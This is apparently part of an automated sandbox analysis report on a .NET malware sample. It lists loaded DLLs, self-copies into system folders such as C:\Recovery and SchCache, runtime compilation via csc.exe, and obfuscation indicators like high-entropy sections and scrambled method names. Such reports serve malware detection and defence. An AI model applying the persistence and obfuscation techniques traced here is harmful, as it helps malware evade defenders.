                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: profapi.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: sspicli.dll
                            Source: C:\Recovery\upfc.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\upfc.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\upfc.exeSection loaded: version.dll
                            Source: C:\Recovery\upfc.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\upfc.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\upfc.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\upfc.exeSection loaded: windows.storage.dll
                            Source: C:\Recovery\upfc.exeSection loaded: wldp.dll
                            Source: C:\Recovery\upfc.exeSection loaded: profapi.dll
                            Source: C:\Recovery\upfc.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\upfc.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\upfc.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\upfc.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: m4n1AQRhaP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: m4n1AQRhaP.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: m4n1AQRhaP.exeStatic file information: File size 2046464 > 1048576
                            Source: m4n1AQRhaP.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1f3200
                            Source: m4n1AQRhaP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: :C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.pdb source: m4n1AQRhaP.exe, 00000000.00000002.1329622101.00000000034BC000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: System.Windows.Forms.pdb2 source: iHstGpVMr4QFhc62UUbis.exe, 0000001B.00000002.1661809574.000000001B847000.00000004.00000020.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            Source: m4n1AQRhaP.exe, XdWiGMa4LIUYIZVEPC3.cs.Net Code: Type.GetTypeFromHandle(ts28QcZsBZ51xAgJMhU.NidtAzv3BqA(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(ts28QcZsBZ51xAgJMhU.NidtAzv3BqA(16777246)),Type.GetTypeFromHandle(ts28QcZsBZ51xAgJMhU.NidtAzv3BqA(16777260))})
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline"
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeCode function: 0_2_00007FF88B4B5471 push ebx; ret 0_2_00007FF88B4B5474
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeCode function: 0_2_00007FF88B4B00BD pushad ; iretd 0_2_00007FF88B4B00C1
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeCode function: 0_2_00007FF88B4B01AA push ds; retf 0_2_00007FF88B4B01B2
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeCode function: 0_2_00007FF88B701D83 push edx; iretd 0_2_00007FF88B701D84
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 25_2_00007FF88B52F5DE pushad ; iretd 25_2_00007FF88B52F5ED
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 25_2_00007FF88B4E5471 push ebx; ret 25_2_00007FF88B4E5474
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 25_2_00007FF88B4E00BD pushad ; iretd 25_2_00007FF88B4E00C1
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 25_2_00007FF88B4FB990 push ss; iretd 25_2_00007FF88B4FB997
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B53F5DE pushad ; iretd 27_2_00007FF88B53F5ED
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B4F5471 push ebx; ret 27_2_00007FF88B4F5474
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B4F00BD pushad ; iretd 27_2_00007FF88B4F00C1
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B4F023D pushad ; ret 27_2_00007FF88B4F0286
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B50B990 push ss; iretd 27_2_00007FF88B50B997
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B741D83 push edx; iretd 27_2_00007FF88B741D84
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 28_2_00007FF88B4FB990 push ss; iretd 28_2_00007FF88B4FB997
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 28_2_00007FF88B52F5DE pushad ; iretd 28_2_00007FF88B52F5ED
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 28_2_00007FF88B4E5471 push ebx; ret 28_2_00007FF88B4E5474
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 28_2_00007FF88B4E00BD pushad ; iretd 28_2_00007FF88B4E00C1
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 29_2_00007FF88B4FB990 push ss; iretd 29_2_00007FF88B4FB997
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 29_2_00007FF88B52F5DE pushad ; iretd 29_2_00007FF88B52F5ED
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 29_2_00007FF88B4E5471 push ebx; ret 29_2_00007FF88B4E5474
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 29_2_00007FF88B4E00BD pushad ; iretd 29_2_00007FF88B4E00C1
                            Source: C:\Recovery\upfc.exeCode function: 30_2_00007FF88B4D5471 push ebx; ret 30_2_00007FF88B4D5474
                            Source: C:\Recovery\upfc.exeCode function: 30_2_00007FF88B4D00BD pushad ; iretd 30_2_00007FF88B4D00C1
                            Source: C:\Recovery\upfc.exeCode function: 31_2_00007FF88B4D5471 push ebx; ret 31_2_00007FF88B4D5474
                            Source: C:\Recovery\upfc.exeCode function: 31_2_00007FF88B4D00BD pushad ; iretd 31_2_00007FF88B4D00C1
                            Source: C:\Recovery\upfc.exeCode function: 31_2_00007FF88B4EB990 push ss; iretd 31_2_00007FF88B4EB997
                            Source: C:\Recovery\upfc.exeCode function: 31_2_00007FF88B51F5DE pushad ; iretd 31_2_00007FF88B51F5ED
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 33_2_00007FF88B4B5471 push ebx; ret 33_2_00007FF88B4B5474
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 33_2_00007FF88B4B00BD pushad ; iretd 33_2_00007FF88B4B00C1
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 33_2_00007FF88B4B01AA push ds; retf 33_2_00007FF88B4B01B2
                            Source: m4n1AQRhaP.exeStatic PE information: section name: .text entropy: 7.534368807138394
                            Source: iHstGpVMr4QFhc62UUbis.exe.0.drStatic PE information: section name: .text entropy: 7.534368807138394
                            Source: uwTuxQS3V.exe.0.drStatic PE information: section name: .text entropy: 7.534368807138394
                            Source: ikEtBZXIKU1m0Gn.exe.0.drStatic PE information: section name: .text entropy: 7.534368807138394
                            Source: upfc.exe.0.drStatic PE information: section name: .text entropy: 7.534368807138394
                            Source: m4n1AQRhaP.exe, bhNNIF870LFx15i0n6g.csHigh entropy of concatenated method names: '_0023wjg', 'Dispose', '_0023Trg', 'MoveNext', '_0023Zvw', 'get_Current', '_0023Wrg', 'Reset', '_0023Xrg', 'get_Current'
                            Source: m4n1AQRhaP.exe, YAfWyo5kIcpqg9OSaUw.csHigh entropy of concatenated method names: 'Ak55KqJp6A', 'QdP5Rhd0Kr', 'cts5xvRXSY', 'foE5hfdgZP', 'vRQq8bi2OZkPUHhMtlf6', 'GVY9Rbi2F44kGcJg5MGu', 'y34P5vi21FmgGiRAx6Yu', 'bgKcmti2sLZ4aTsn4BA7', 'BcQVw4i237aJ2eoXRLss', 'F2ZZ9ei2nU7teuTm9aTR'
                            Source: m4n1AQRhaP.exe, O6urXfzyVeiHL1d6mK.csHigh entropy of concatenated method names: 'rh6iiynu7B', 'XTaiWdDuwq', 'Bdbi562kUh', 'lr8iAHaOSa', 'Pd9iDZ6Fs7', 'EPRicqWgri', 'mMCiXV4slq', 'ajLZGxiKkoYUCQdQdwx2', 'hCJgKciKyCO5htnmwbYN', 'e1U69EiKKNSMojY39spO'
                            Source: m4n1AQRhaP.exe, hRw3RpgaIDEq22bA7wZ.csHigh entropy of concatenated method names: 'FhLfqKPwBN', 'KyEPqEios6A2pEIeDVey', 'LkZcYcio3bxLqcHKouds', 'OKX9L0io1BCRoftq8i5S', 'EPcMKdioOcZvOCLmrLeE', 'dGOcvyionKwn3sT7DRoM', 'CPX', 'h7V', 'G6s', '_2r8'
                            Source: m4n1AQRhaP.exe, QRe8VhbYUxABd0tta5y.csHigh entropy of concatenated method names: 'GXAb9LoJCC', 'zWQbwFUMyc', 'K7obG97Syl', 'kG5b0Qx9PK', 'DucbSRjlwv', 'WiVbTRvoLR', 'gjPbgtw2gq', 'MHNbfeBqTW', 'XJobJacKxY', 'wqrbvjCxQi'
                            Source: m4n1AQRhaP.exe, z49cVIiyJrxPt7xkFVn.csHigh entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'mcnim1LTfjx', 'u23iWgWM9lo', 'uSiV9AiKg9WI5o3PtKmG', 'TcFK9fiKfq5MZ9FMbbfB', 'Pof78EiKJl4SAeia553N'
                            Source: m4n1AQRhaP.exe, L0QdSZVUVbNw4tJyfaA.csHigh entropy of concatenated method names: 'zdXVN4KoeE', 'cL1VeDLV0l', 'hxdVk832ud', 'Aaohukir6au76PLYo1SO', 'zb8VU6irVRE8AFpJCNXG', 'GNDMICirqXVJX955Q6gG', 'KTUSxoirQUoulC9Tit7W', 'XkAvOhirFdIF7kdPutwD', 'MWTX8Pir1fvUH56ditka'
                            Source: m4n1AQRhaP.exe, rwk4YOHrXRYY1hW8CCs.csHigh entropy of concatenated method names: '_2SY', 'u8Qim8U4Noa', 'HDJHCKehY8', 'TQeimbRgLM7', 'sZIk1OibOKJ8R1HdlILP', 'YERQ0yibsqkt7yHF3HSF', 'aKjh15ibFIGeBvxNchcq', 'GoGy04ib1HOCoFd6SSar', 'ovdqKrib3R16faYgOjX8', 'vmpT4Oibn2pXiCo3tmcm'
                            Source: m4n1AQRhaP.exe, D4Le3AsvSOAorifGMYu.csHigh entropy of concatenated method names: 'k7E7oUi9bquuNL0veKw7', 'zuMgfCi9LCtNhbVDpc7W', 'dMJHcGi98aDep1aVOum8', 'vHg7kUOjVp', 'oby18ai9YvpxSy88pyfK', 'py9nO3i9uav73N3ql0gy', 'FtixR5i9CDsCHFsaCtIo', 'dYDOs3i9jarZVlJCIUcG', 'c74Trci99Hlq6eAxH12F', 'iaP7RI0kh8'
                            Source: m4n1AQRhaP.exe, sqtbm1FnEBCKVgWDRZW.csHigh entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'Vq6F4GxRss', '_947', 'GLZFUNWG0I', 'C0gF7lBYBX', '_1f8', '_71D'
                            Source: m4n1AQRhaP.exe, XdWiGMa4LIUYIZVEPC3.csHigh entropy of concatenated method names: 'hOsEbdiZKAmgVELCHMkC', 'xafH81iZRGDNS5XcMYfR', 'XPEBBQge5f', 'ycYQymiZPmx8A6BeAiOT', 'BIbnybiZpymOP7Z83Vjp', 'Dbv0iRiZEs2pyJclYx36', 'KKWvnuiZLdpBOiMZKt8O', 'eRFSdpiZ8lTKsMaTftD9', 'm0mOZ1iZbtaet2JrC1aH', 'tJ0qeLiZrnuXjgDeB2Wo'
                            Source: m4n1AQRhaP.exe, kBW6fNTfW2Jeii3Y4se.csHigh entropy of concatenated method names: 'TxNTvEyn8a', 'qcrTMwamEF', 'A1MTogLX4n', 'foxTa5E3Si', 'ttxTBnmipF', 'uo9TZsb6pk', 'Sd7TlSkvTQ', 'dSrTzXPcAH', 'umJgdyepiX', 'PhIgixjxMR'
                            Source: m4n1AQRhaP.exe, TqnbJ3RIqtY5PLL2rpO.csHigh entropy of concatenated method names: 'z6LRUOGIXS', 'Hm2R7qmjdM', 'sAmRNQvt9E', 'sl2Re5H5wJ', 'JPdRkbkwwb', 'oXCRyadle6', 'Ha3TjAi0NFuETVTjVw7Y', 'ckMkDfi0UvrBXVaL7XEe', 'VdC0tni07YUQYd4UgU2e', 'zm4IbFi0eQP0BDHDVpmG'
                            Source: m4n1AQRhaP.exe, A5eNpxH15GRB2tePjJc.csHigh entropy of concatenated method names: '_5t1', 'd65', 'JVpi5yEFJT2', 'Swji5KRFQ3X', 'z4lHsFLNih', 'Rr1impRLsDG', 'RDSi5d0rLjT', 'EoIj1di80DUvQZfdBbD4', 'SxJTuGi8SVO6Vlf14LS3', 'tuBJVUi8T7q5Fk1DSHyj'
                            Source: m4n1AQRhaP.exe, LXiUXV5LO66BoSltp9I.csHigh entropy of concatenated method names: 'vyF5bA1CIi', 'Ygx5ro4MC3', 'BQv2rHi2eux9xddGsojo', 'vAh8b0i27vpwSyxocqDY', 'haarLti2NxmyvZlnsomQ', 'KHTxTJi2ksxoxlxE5H3p', 'qWHECZi2yyq1jXOhSMaN', 'vOn8hNi2KON8qFoeqXcr', 'q5sk8fi2R6SaiQuL0SHQ'
                            Source: m4n1AQRhaP.exe, XVNOmZskL4HgPawKDDL.csHigh entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
                            Source: m4n1AQRhaP.exe, Kw6TNZWZb5jar7GS6HF.csHigh entropy of concatenated method names: 'ril5FrP1jY', 'jvTBL9i2iKGaQqqku3n0', 'stZ41wi2tx3qhcck0h0q', 'wFPwOWihzJLaU69LXSIF', 'tahQoEi2d90q2m9ZC8Ft', 'kcWN21i2DJ1TjkMPAity', 'McrQRai25BauX818OCuL', 'OUwLexi2AsBI4RdZ2mYO', 'cJaWc1i2cStDWS3YhYM8', 'NUb57Xo3YZ'
                            Source: m4n1AQRhaP.exe, QWfbcVJ5Vj5bpxDgA1p.csHigh entropy of concatenated method names: 'bZbJDchAyt', 'R4uJc2VG2h', 'mIwJmlfavX', 'C1nJX67n4S', '_0023Nn', 'Dispose', 'qBV3Xviain5DYlhHMvJJ', 'kRPdhkiozAB0Y3CTSWU6', 'mPZdN0iadqcCDyn6QBK7', 'QJdLq8iatWVyPR1oUv9J'
                            Source: m4n1AQRhaP.exe, dKCQbUA7jq6MGQrBlsP.csHigh entropy of concatenated method names: 'EIQALX72Ia', 'LsIA8HMHJV', 'vF22G4iP4QQfWATABgnV', 'MTIYeeiPUgJwEvaXvqX3', 'W59hj0iP7uKaILi8YtHf', 'jQnAenOKOM', 'HjgAkRr3cR', 'lT6Ay6nIXO', 'rfnAK7LXYn', 'EKmARpFDIU'
                            Source: m4n1AQRhaP.exe, BKLtyPxugE328aFpcZo.csHigh entropy of concatenated method names: 'zW6xY6SGqj', 'LObxjwvekM', 'xTmx9a4bim', 'YyKxwv6M7a', 'Jp5xG98hjC', 'yndx0XPKOB', '_4tg', 'wk8', '_59a', '_914'
                            Source: m4n1AQRhaP.exe, fBIcvyx4guMFruNZiov.csHigh entropy of concatenated method names: 'RmAx70lrkR', 'fw4xNIUkRe', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'v79xeiTmrU', '_96S', '_9s5'
                            Source: m4n1AQRhaP.exe, FwDJ4wZUBXH5rlSUSn2.csHigh entropy of concatenated method names: 'W2IZp2dMal', 'BgcZE8Vk6h', 'V0QZLISDN4', 'IpVZ8Ml74d', 'lMXZbQKm8N', 'kWfZrOwotP', 'BjBZur9h9r', 'GfqZCsVflr', 'XWTZY6SsdK', 'G3KZjgU7vX'
                            Source: m4n1AQRhaP.exe, qptSGbtn2rumTUkrmxV.csHigh entropy of concatenated method names: 'iQAt4mRBGS', 'iuytUYLmqW', 'qoE5HHiRBtoI4YPHpNdu', 'g8CxsIiRoqV6TUPPWxmY', 'rMNSfriRabXfiZgY3MEm', 'LeHc9viRZqwIOZMDKfh2', 'WMrIldiRlFZ83hcRXBV5', 'PqiD4biRzxFMVSBLhrHp', 'PuaFUXixdcFViemgsTvl', 'LlSZcLixiUPhW1LAU8E8'
                            Source: m4n1AQRhaP.exe, WauZonfkjA3WsYlMTns.csHigh entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'QLyfKnl0mo', 'ImcPJWiop40hCRhZrEwV', 'fte4I4ioENCGeaULtIe4', 'fkxfC4ioLt8Zba6qZpgg', 'gwQDycio8WT1vh42gpq9', 'QIGYnAiob8HsY5AJcxxQ', 'gG20criorIDZm9lErFHs'
                            Source: m4n1AQRhaP.exe, ktEOkxA0CHbZsBvIAo2.csHigh entropy of concatenated method names: 'h2YABdD3kq', 'mTvAZlA0Dn', 'yZ01kNiP23FFUmFLMr1u', 'tedT3hiPPVtik2aaj7hl', 'I7kDinK1YF', 'AkdWrfiP8GMwJQSleAfp', 'VFMyy1iPEJSQ3xbCV46Y', 'tkyitMiPLWxGC9N4DFlZ', 'u7Z6PLiPb3O1XYZM8DR3', 'o98ATsnwMB'
                            Source: m4n1AQRhaP.exe, V0C0FFcM4iuDN1XEUF8.csHigh entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'O5ETQhiEhvGl7Doo4sZm', 'ncevSxiE2PbqFSDaa4gC', 'nlDsCJiEPAbIcKF2BQ3R', 'aDycaOpoVP'
                            Source: m4n1AQRhaP.exe, da71u3XzdGhU80L7hxW.csHigh entropy of concatenated method names: 'UXOHD78ZHu', 'sYl5AUi8hSw6ySmabZfB', 'W3Kj8ri82rCNGlkNTlOU', 'CKbx1mi8PRyymLsFJ6Ib', 'VvyuOSi8p3Ud59rHosNZ', 'eq7', 'd65', 'Dxmi54wKuhw', 'lqYi5UCQQq4', 'F9Oim2voNTB'
                            Source: m4n1AQRhaP.exe, VGgd7RWOTwyDwqIN5wx.csHigh entropy of concatenated method names: 'xbhWRG46RY', 'OMPWxCJfjv', 'afdWhO5ftK', 'gMTLbmihXsWHPrcocC7l', 'NaQuUdihH6mmIqTJBFLe', 'z5ObX9ihcoJ1wVJuFuCb', 'QfdDoBihmBNrNBj1qvjJ', 'VnuWe0ZGAZ', 'tkgWknBdiI', 'AwvufjihAVeRFobajup4'
                            Source: m4n1AQRhaP.exe, hAXJD6VDqyicTN7j1gf.csHigh entropy of concatenated method names: 'LnGbtRircpYv4ZlZTIA6', 'u8vWsTirmy8O9TJJMH10', 'hDEM7WirXyMt7jME0vlW', 'qxcbM6irAvCo69OIRK8m', 'UsA9VtirDIZHM8Iq5jFY', '_7kT', '_376', 'EavVmbTpk1', 'cj1VXRXPHn', '_4p5'
                            Source: m4n1AQRhaP.exe, LN1jilQJyOQN6SeXWRX.csHigh entropy of concatenated method names: 'MHwQMSiuEr', 'r4qQoUO6ax', 'x9kQaDWStA', 'l6KQBJGZ97', 'DmlQZMUhmK', 'UbUfbriubksX3ILLkTDD', 'fO1m0viuLI8ajBFaqcye', 'UjhATliu8OaChRvNKrf4', 'pRvFkIiurYNMNv0bGRFY', 'yJb4mMiuumMCwZOBZqfi'
                            Source: m4n1AQRhaP.exe, EMmKXdt9PucLSqdPnLh.csHigh entropy of concatenated method names: 'SZctZpmbWC', 'HJetlsRbWV', 'ks8tzNpdpU', 'SNHAaoixLEqgtkDBqyZN', 'pK7moTix8MyUMFDjyeBc', 'pG3UCUixpTUZsOdOX8CD', 'djQ5UnixEuCvbuuwuFlX', 'lsvWAUD2CT', 'lVpXpIixrkKsUMmAXULM', 'wIThd3ixuKnFqoSyMpuN'
                            Source: m4n1AQRhaP.exe, McC1Rkb3q2XT9bOH3CL.csHigh entropy of concatenated method names: 'FZebIMP7Vc', 'kldb4ylNj7', 'IWLbUbWTdD', 'TmHb7WSm2S', 'Hb2bNFo41H', 'aAHbeNjLub', 'T9gbkTJAXt', 'lDqbyWxVWE', 'M2ubKP7jGx', 'Dy5bR1moJx'
                            Source: m4n1AQRhaP.exe, biMDVU5f1KS1OrYTdU1.csHigh entropy of concatenated method names: 'xpm5ZxWAnP', 'rga5lhXnS1', 'Hee5zFgsAN', 'gr6C2Zi2SMk0LDX7Zclx', 'YaaedTi2T8Atq38BZ3iI', 'A4S7S8i2GIlRyEXMNSGC', 'wibvwDi203Fk6L3NsFBj', 'jlE5vdOtD6', 'PLd5Mofs8a', 'lOj5o7Nilm'
                            Source: m4n1AQRhaP.exe, EN97NHX2omQS1yrfxAn.csHigh entropy of concatenated method names: 'w4XXCo3dPt', 'cTSNXji8WoaoLAiy6l5V', 'ANBxDIi8iLabdL4dDEWk', 'qRMV7Qi8tV3KGEHs22sy', 'TnDpjwi85CFM8CsLQvP0', 'd3HXaEi8ANwRqd9PBITr', 'UU8', 'd65', 'hAhi5Q1IHWh', 'Es9i5FdeNSB'
                            Source: m4n1AQRhaP.exe, IluXLRO7qug7oBt2Ycp.csHigh entropy of concatenated method names: 'vrsOGX5nBB', 'UgMOe8VZNM', 'FDnOkNKXCT', 'jFLOyi5gRs', 'MU8OKB1XFB', 'l2fORrQGxr', 'Eo2Ox1vuiH', 'K34Ohlr1fH', 'sjvO2cAjli', 'meVOPHQ8h2'
                            Source: m4n1AQRhaP.exe, yBONYJstyJ96Ut1a1FA.csHigh entropy of concatenated method names: 'xsZssKM3Xe', 'V1gsnwxOcS', 'CP3s5hc9NY', 'N0qsAX23GH', 'KJxsDAJFsu', 'x4SscNFU0d', 'e7tsmbrMsd', 'ABYsXa3YL0', 'UV4sHKEuH4', 'yF1sVfm1Jk'
                            Source: m4n1AQRhaP.exe, z7itLp1zUSVZp5krT4I.csHigh entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'B6IOisLyQe', 'PLuOtMl9I6', 'gY2', 'rV4', '_28E'
                            Source: m4n1AQRhaP.exe, wN6TR62PNcuBGraICgd.csHigh entropy of concatenated method names: 'xgY2Ee5ICT', 'jdd2LWbfgq', 'mDY285Y3UA', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'Vnu2bQpkGS'
                            Source: m4n1AQRhaP.exe, fA0bdqHavhgYNgrQu9R.csHigh entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'eaRHZam0ur', 'rlYimYdwhdF', 'G8fHlX3gyP', 'ADdimjuyh3c', 'iVAPWPibbv01B4y4OODl', 'l4RZ41ibLk1PrcMtBWrb', 'Dlv16vib8pxq7eMpkogQ'
                            Source: m4n1AQRhaP.exe, G2HVua2KLdRA0rubAV8.csHigh entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
                            Source: m4n1AQRhaP.exe, AIluKXZ93jCyii70Yy5.csHigh entropy of concatenated method names: 'weLiDSOvVDm', 'UZUiDT8Ypw0', 'Qr9iDgr3WBT', 'jw4iDfHw6Yy', 'y4PiDJlfDF9', 'cxJiDvRaZpE', 'zt4iDM4AuTQ', 'gxelXrpGcB', 'gMgiDo3X7wt', 'z7EiDamjBsT'
                            Source: m4n1AQRhaP.exe, nE3iYxsOdRP6WmcNBJ.csHigh entropy of concatenated method names: 'H3rE2qDmT', 'FfpjGsiyMBl3wYuGioy0', 'pvA4ImiyoVOFDeJjjM9I', 'FOG5hBiyJXm55CU0BSXF', 'dt30jViyvCc0keLCIRVx', 'reEnZWeAv', 'rUTI2EBa2', 'znI4QjSeo', 'GB3UrNnxq', 'Qse7Q83aC'
                            Source: m4n1AQRhaP.exe, FIsNoTf22BT97vChVS0.csHigh entropy of concatenated method names: 'pn0fEdJLNs', 'WB8frWVKdp', 'flpfY2fmEq', 'io3fjARUri', 'HYIf93nxJq', 'C7HfwHmMeX', 'j3RfGsZHb1', 'shSf0dHTvZ', '_0023Nn', 'Dispose'
                            Source: m4n1AQRhaP.exe, QrSHCO69Vh3KIRC562V.csHigh entropy of concatenated method names: 'jZX6GSmPhq', 'g48606LXWl', 'WMM6SfLMTK', 'DKj6Tj3nrY', 'TsU6gGEZIS', 'WYZM7NirliFZOEPrgR7J', 'g6mOGbirBKAmX5rEoIO4', 'nHhJ5KirZOutq29tDN0l', 'SxkBYbirzCX7k3XDkoRw', 'SMwsKZiud8TgEhwLPcpc'
                            Source: m4n1AQRhaP.exe, eVxdEOJ6IiZF6h1mixg.csHigh entropy of concatenated method names: 'tCjiDbFpfJu', 'aEpiDrTGdeF', 'R2WiDur8QGL', 'VyFjaSiab04gClAKQPEv', 'yUgJW7iaLlemyq2IwJL7', 'uaPxOwia8rB7JRMdxHlo', 'AGLim0Sk2YT', 'aEpiDrTGdeF', 'gM7VXtiaYYEUpf6UMU7n', 'bwOiwEiaugqJvMQlQLnX'
                            Source: m4n1AQRhaP.exe, SRwrL0RJShOOYXtPs2F.csHigh entropy of concatenated method names: 'fXvRMY10mX', 'MjARosRmBk', 'mUWRauVnwW', 'UgdRBySud6', 'OX2RZjNdLk', 'mCBRlQ2gSm', 'qvvRzofPgt', 'Fy5xdnIEfe', 'fKkxiWuQRy', 'Wrcxtqh3dv'
                            Source: m4n1AQRhaP.exe, q1KTHULmV7Os1wyO7HJ.csHigh entropy of concatenated method names: 'x2sLHxi1jD', '_64r', '_69F', '_478', 'S2xLVfaaJH', '_4D8', 'GQ4LqjhJ9M', 'atpL687Ktc', '_4qr', 'znELQRdi3i'
                            Source: m4n1AQRhaP.exe, xsl9dhMqK1WElLrrPFs.csHigh entropy of concatenated method names: 'HAyMQlqtpb', 'sfrMFQhq5J', 'j2PM1UhkE2', 'ULZMOcuUhx', 'BM9Ms5ArIT', 'YgIM3i5jJc', 'fppLuRiBJyWTQpTbwU2B', 'vmenNkiBvXBp9WvT2Fe0', 'eO6MaQiBMrGqnDoLObAs', 'GKrQudiBoHJ3RqxyiGBH'
                            Source: m4n1AQRhaP.exe, QRRm9bp7aYZuSp4bBre.csHigh entropy of concatenated method names: 'q1AE1eEKbh', 'jLLrQ7igvI8qPemTv4QC', 'DXdEHOigMcFnlWWWNtqD', 'l0ZsAOigoGMY6WwSRYsm', 'i5X', 'oZxpeCZLud', 'W93', 'L67', '_2PR', 'p6J'
                            Source: m4n1AQRhaP.exe, wCsp4uHXAZxyw245L7b.csHigh entropy of concatenated method names: 'NaEHQCpm15', 'aSiX0ei8j7DO8XI392Jb', 'eUG9x5i8CCj6F9RWHwe2', 'bwhL8Ai8YgATmOUlaGAY', 'bBWhfBi896p551fsHT5l', 'Ke6jJKi8wyH6oqJIe2kW', '_53Y', 'd65', 'Uyei5NWEkgE', 'YPQi5e0hcnD'
                            Source: m4n1AQRhaP.exe, X6kEemXMGhNALG2aJmh.csHigh entropy of concatenated method names: '_46E', 'd65', 'LHgXadBqAx', 'fanimh6Nts3', 'RDSi5d0rLjT', 'eunXBkdeOk', 'Niunpti8IKLSHWLp77fp', 'VfBjgki84ugOQFdKv2yk', 'PYRwgui83AOcbT2hid7m', 'RxZlbHi8ny4Nsp1PJE1w'
                            Source: m4n1AQRhaP.exe, PYOyPTmSZupKYHYyKWy.csHigh entropy of concatenated method names: 'OcKmMW4NPj', 'sYhmoeV8hu', 'RqTmawJkwT', 'S2hmBqARnr', 'y3UmZbnGy6', 'veGmlavGW3', 'oB4mzoWCFw', 'uJBSC6iL4bKb8hrFxi28', 'at2lI5iLnmAU2fXPZlas', 'zrKbDdiLIkvFejXicO3d'
                            Source: m4n1AQRhaP.exe, Hl18MKESQd3HC0VD4Nb.csHigh entropy of concatenated method names: '_25r', 'h65', 'a1hEgbjInl', 'WFDEfb2qv8', 'mVmEJssQTk', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
